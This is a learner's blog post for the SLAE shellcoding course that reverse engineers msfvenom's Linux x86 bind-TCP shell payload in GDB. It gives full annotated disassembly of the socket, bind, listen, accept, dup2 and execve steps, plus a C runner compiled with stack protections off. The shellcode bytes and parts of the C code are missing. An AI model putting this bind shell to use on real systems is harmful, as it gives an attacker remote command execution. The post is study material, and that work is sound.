Hi there!

My shellcoding journey led me to the SLAE course and now I am working on the assignments. First two tasks are about basic shellcode writing where you are tasked to write shellcode_bind_tcp and shellcode_reverse_tcp shellcodes.

Well, they are basic in comparsion with other shellcoding topics, but it made me cry when I first time tried to write these shellcodes by myself :D

So, I asked myself - “Can I use someone else’s code to write my own?”.

I took GDB in my left hand and PEDA in right, and immersed into the msfvenom-generated linux/x86/shell_bind_tcp shellcode reverse engineering process.

Bind TCP Shellcode

As I said before, I used msfvenom-generated payload that opens default TCP/4444 port and waits for incoming connection.

If you are going to repeat whole my workflow, you can use this shellcode:


Shellcode Execution

Well, in order to execute this shellcode I used simple code written in C:


unsigned char shellcode[] = 

int main()
    printf("Shellcode Length: %d\n", strlen(shellcode));
    int (*ret)() = (int(*)())shellcode;

If you inspect this, you will probably note that I placed “\xcc” byte before shellcode body. This is an opcode for INT 3 instruction that allows us to pause execution process when it will be reached like when there is a breakpoint.

Compile this C-file with ‘gcc -fno-stack-protector -z execstack executor.c -o executor’

GDB Journey

Now we are ready to investigate our shellcode. If you open executor in gdb and enter ‘run’ command, you will see that execution stops on the INT 3 instruction:

EAX: 0x804a040 --> 0xf7db31cc 
EBX: 0xb7fc4ff4 --> 0x1a7d7c 
ECX: 0x0 
EDX: 0x0 
ESI: 0x0 
EDI: 0x804a056 --> 0x106a5c11 
EBP: 0xbffff368 --> 0x0 
ESP: 0xbffff32c --> 0x8048430 (<main+76>:	mov    edi,DWORD PTR [ebp-0x4])
EIP: 0x804a041 --> 0xe3f7db31
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   0x804a03c <__dso_handle+24>:	add    BYTE PTR [eax],al
   0x804a03e <__dso_handle+26>:	add    BYTE PTR [eax],al
   0x804a040 <shellcode>:	int3   
=> 0x804a041 <shellcode+1>:	xor    ebx,ebx
   0x804a043 <shellcode+3>:	mul    ebx
   0x804a045 <shellcode+5>:	push   ebx
   0x804a046 <shellcode+6>:	inc    ebx
   0x804a047 <shellcode+7>:	push   ebx
0000| 0xbffff32c --> 0x8048430 (<main+76>:	mov    edi,DWORD PTR [ebp-0x4])
0004| 0xbffff330 --> 0x8048510 ("Shellcode Length: %d\n")
0008| 0xbffff334 --> 0x15 
0012| 0xbffff338 --> 0x8049ff4 --> 0x8049f28 --> 0x1 
0016| 0xbffff33c --> 0x8048461 (<__libc_csu_init+33>:	lea    eax,[ebx-0xe0])
0020| 0xbffff340 --> 0xffffffff 
0024| 0xbffff344 --> 0xb7e4fdd6 (add    ebx,0x17521e)
0028| 0xbffff348 --> 0xb7fc4ff4 --> 0x1a7d7c 
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0804a041 in shellcode ()

That is enough for us. Run the ‘disassemble’ command and get disassembly for our shellcode.

Let’s split our disassembly into different int 0x80 calls.

The First Part

Ok, if you have done things right, you will see something like that in the first part of your code. Disassembly:

0x0804a041 <+1>:	xor    ebx,ebx
0x0804a043 <+3>:	mul    ebx
0x0804a045 <+5>:	push   ebx
0x0804a046 <+6>:	inc    ebx
0x0804a047 <+7>:	push   ebx
0x0804a048 <+8>:	push   0x2
0x0804a04a <+10>:	mov    ecx,esp
0x0804a04c <+12>:	mov    al,0x66
0x0804a04e <+14>:	int    0x80

Instruction set used by the shellcode author allows us to avoid 0x00 bytes in our shellcode, but makes our research not so easy task. We try to understand main steps performed by this shellcode, so, we don’t need to avoid 0x00 or other bad chars (I have written a simple XOR-encoder for that). So, let’s convert this code to something more readable.

Rewritten Code:

push 0x00
push 0x01
push 0x02

mov eax, 0x66
mov ebx, 0x01
mov ecx, esp

int 0x80

I skipped some instructions that setting our registers equal zero, because they are common for every assembly program.

Ok, what do we see here? Syscall with number 0x66 was called. I used this to determine syscalls by their codes. For example, 0x66 is a number for SYS_SOCKETCALL.

SYS_SOCKETCALL requires socketcall code to be loaded into EBX. In our case, EBX equals 0x01 that makes int 0x80 calls SYS_SOCKET. Where did I find that? From Linux sources.

This piece of Linux Kernel is very important for us, so I will paste it here:

#define SYS_SOCKET	1		/* sys_socket(2)		*/
#define SYS_BIND	2		/* sys_bind(2)			*/
#define SYS_CONNECT	3		/* sys_connect(2)		*/
#define SYS_LISTEN	4		/* sys_listen(2)		*/
#define SYS_ACCEPT	5		/* sys_accept(2)		*/
#define SYS_GETSOCKNAME	6		/* sys_getsockname(2)		*/
#define SYS_GETPEERNAME	7		/* sys_getpeername(2)		*/
#define SYS_SOCKETPAIR	8		/* sys_socketpair(2)		*/
#define SYS_SEND	9		/* sys_send(2)			*/
#define SYS_RECV	10		/* sys_recv(2)			*/
#define SYS_SENDTO	11		/* sys_sendto(2)		*/
#define SYS_RECVFROM	12		/* sys_recvfrom(2)		*/
#define SYS_SHUTDOWN	13		/* sys_shutdown(2)		*/
#define SYS_SETSOCKOPT	14		/* sys_setsockopt(2)		*/
#define SYS_GETSOCKOPT	15		/* sys_getsockopt(2)		*/
#define SYS_SENDMSG	16		/* sys_sendmsg(2)		*/
#define SYS_RECVMSG	17		/* sys_recvmsg(2)		*/
#define SYS_ACCEPT4	18		/* sys_accept4(2)		*/
#define SYS_RECVMMSG	19		/* sys_recvmmsg(2)		*/
#define SYS_SENDMMSG	20		/* sys_sendmmsg(2)		*/

Ok, but what about values pushed into the Stack? I mean first three lines of our code. Well, this is just parameters for our SYS_SOCKETCALL calling SYS_SOCKET.

Run ‘man socket’ in your command shell and you will see this declaration: int socket(int domain, int type, int protocol);

So, our push instructions mean something like that:

push 0x00    ; protocol (IP)
push 0x01    ; type (SOCK_STREAM)
push 0x02    ; domain (AF_INET)

In two words, first part of our shellcode executes fuction ‘int socket(2, 1, 0)’.

The Second Part

Let’s start from disassembly again.


0x0804a050 <+16>:	pop    ebx          
0x0804a051 <+17>:	pop    esi          
0x0804a052 <+18>:	push   edx          
0x0804a053 <+19>:	push   0x5c110002    
0x0804a058 <+24>:	push   0x10         
0x0804a05a <+26>:	push   ecx           
0x0804a05b <+27>:	push   eax
0x0804a05c <+28>:	mov    ecx,esp
0x0804a05e <+30>:	push   0x66
0x0804a060 <+32>:	pop    eax
0x0804a061 <+33>:	int    0x80

Rewrite this piece of code.

Rewritten Code:

push dword 0x00
push word 0x5c11
push word 0x0002 

push dword 0x10        
push ecx          
push eax

mov eax, 0x66
mov ebx, 0x02
mov ecx, esp

int 0x80

Well, not so easy as the first part :D We can see familiar int 0x80 interruption with EAX equals to 0x66 (SYS_SOCKETCALL) and EBX equals to 0x02 (SYS_BIND).

Read ‘man bind’ and find the next declaration: ‘int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);’.

So, from SYS_SOCKETCALL definition, EAX and EBX should store syscall codes and ECX should be pointing to the parameters. There is a strange struct from bind() declaration - struct sockaddr - and I found code of this structure here.

Here is the code for this struct:

struct sockaddr_in {
    short            sin_family;   // e.g. AF_INET, AF_INET6
    unsigned short   sin_port;     // e.g. htons(3490)
    struct in_addr   sin_addr;     // see struct in_addr, below
    char             sin_zero[8];  // zero this if you want to

It is not so hard to find corresponding instructions in the disassembly:

push dword 0x00  ; sin_addr
push word 0x5c11 ; sin_port
push word 0x0002 ; sin_family

Here 0x5c11 - the number of TCP port used by this shellcode, and 0x0002 - AF_INET. If you convert 0x5c11 to decimal, you will see strange number (23569). Obviously, this is not the port number in common sense. Network interaction uses big-endian instead little-endian of our x86 machine. To convert 0x5c11 to port number, you should change positions of the bytes - dec(0x115c) = 4444.

Record ‘sin_addr’ equals zero, this means that port will be opened on, i.e. on all interfaces.

What about next three lines in our rewritten disassembly? I mean this:

push dword 0x10
push ecx
push eax

Well, this works like a magic, but ECX on this step poins to our ‘sockaddr’ structure. Together all these strings form all params of the bind() function. 0x10 is a length of our sockaddr structure and EAX stores socket descriptor.

Going next!

The Third Part:


0x0804a063 <+35>:	mov    DWORD PTR [ecx+0x4],eax
0x0804a066 <+38>:	mov    bl,0x4
0x0804a068 <+40>:	mov    al,0x66
0x0804a06a <+42>:	int    0x80

Oh, no rewriting at last!

EAX still equals 0x66 and EBX equals 0x4. That gives us SYS_LISTEN call with declaration ‘int listen(int sockfd, int backlog);’.

On int 0x80 step our stack looks like this:

0000| 0xbffff314 --> 0x7 
0004| 0xbffff318 --> 0x0 
0008| 0xbffff31c --> 0x10 
0012| 0xbffff320 --> 0x5c110002 
0016| 0xbffff324 --> 0x0 
0020| 0xbffff328 --> 0x0 
0024| 0xbffff32c --> 0x8048430 (<main+76>:	mov    edi,DWORD PTR [ebp-0x4])
0028| 0xbffff330 --> 0x8048510 ("Shellcode Length: %d\n")

You can see 0x7 (int sockfd) and 0x0 (int backlog) values on the top. ECX points on the top of stack too, so, ECX value doesn’t change.

The Fourth Part


0x0804a06c <+44>:	inc    ebx
0x0804a06d <+45>:	mov    al,0x66
0x0804a06f <+47>:	int    0x80

Ok, we are remember that EBX equals 0x4. First instruction increments it, so, we can say that int 0x80 will perform SYS_ACCEPT socketcall here.

Here is a small quote from man-page:

The accept() system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.

The argument sockfd is a socket that has been created with socket(2), bound to a local address with bind(2), and is listening for connections after a listen(2).

The Fifth Part:


0x0804a071 <+49>:	xchg   ebx,eax
0x0804a072 <+50>:	pop    ecx
0x0804a073 <+51>:	push   0x3f
0x0804a075 <+53>:	pop    eax
0x0804a076 <+54>:	int    0x80
0x0804a078 <+56>:	dec    ecx
0x0804a079 <+57>:	jns    0x804a073 <shellcode+51>

Ok. Again, before int 0x80 call, EAX equals 0x3f that means SYS_DUP2 syscall. It has next declaration - ‘int dup2(int oldfd, int newfd);’.

Dup2 allows us to redirect messages from one file descriptor to other. In this case, ECX will store source file descriptor (in our case - STDIN, STDOUT, STDERR) and EBX will store destination file descriptor (in our case - returned by accept()).

Jns instruction creates a loop where all three (STDIN, STDOUT, STDERR) file descriptors become redirected to our accept() descriptor.

From my point of view, this is the most interesting part of this shellcode. To be mentioned, this part allows us to send commands for command shell and receive results and errors.

The Sixth Part


0x0804a07b <+59>:	push   0x68732f2f
0x0804a080 <+64>:	push   0x6e69622f
0x0804a085 <+69>:	mov    ebx,esp
0x0804a087 <+71>:	push   eax
0x0804a088 <+72>:	push   ebx
0x0804a089 <+73>:	mov    ecx,esp
0x0804a08b <+75>:	mov    al,0xb
0x0804a08d <+77>:	int    0x80
0x0804a08f <+79>:	add    BYTE PTR [eax],al

What are the 0x68732f2f and 0x6e69622f numbers? Look at the char codes and you will see that first two pushes are equal next construction:

push 'hs//'
push 'nib/'

Next, the pointer on ‘/bin//sh’ is placed to EBX. We don’t need to manually place 0x00 byte at the end of this string because this byte already persists on the top of the stack.

EAX store 0xb code that makes int 0x80 interruption SYS_EXECVE call.

This part is responsible for command execution in this bind shell. After dup2 calls it calls /bin/sh interpreter and allow us to execute commands on the remote machine.


As you can see, even so simple payload has at least six logical parts.

Reversing more complex shellcodes like reverse tcp or reverse https (oh, god!) will be my headache for the next few weeks and I will try to publish all my results. After that, I believe, I will be able to successfuly finish SLAE Assignments.

If you have any questions, feel free to comment this post, or write me directly.

Good Luck!

The end